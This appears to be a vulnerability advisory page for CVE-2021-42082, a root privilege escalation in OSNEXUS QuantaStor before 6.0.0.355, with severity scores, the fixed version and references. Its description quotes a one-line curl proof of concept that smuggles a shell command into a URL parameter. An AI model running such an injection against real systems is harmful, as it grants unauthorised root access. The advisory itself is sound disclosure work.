What’s Vulnerable › Vulnerabilities
CVE-2021-42082: Local Privilege Escalation to root in OSNEXUS QuantaStor before 6.0.0.355
- Severity: high (CVSS 7.8 v3.1)
- Exploited in the wild: not listed in CISA KEV
- EPSS: 0.2% probability of exploitation in the next 30 days
- Public exploit or detection template: none known
- Published: 2023-07-10 · updated 2026-06-17
- Weakness: CWE-269
Description
Local users are able to execute scripts under root privileges. POC On the local host run the following command: curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami`'
Affected products
- OSNEXUS QuantaStor: before 6.0.0.355 — fixed in 6.0.0.355
How to fix
Upgrade to a fixed version: OSNEXUS QuantaStor 6.0.0.355. Check the vendor advisory for mitigations.
References
- https://csirt.divd.nl/CVE-2021-42082
- https://csirt.divd.nl/DIVD-2021-00020/
- https://www.osnexus.com/products/software-defined-storage
- https://www.wbsec.nl/osnexus
- https://csirt.divd.nl/CVE-2021-42082
- https://www.divd.nl/DIVD-2021-00020
- https://www.osnexus.com/products/software-defined-storage
- https://www.wbsec.nl/osnexus
Get alerted when CVE-2021-42082 or the next vulnerability affects your stack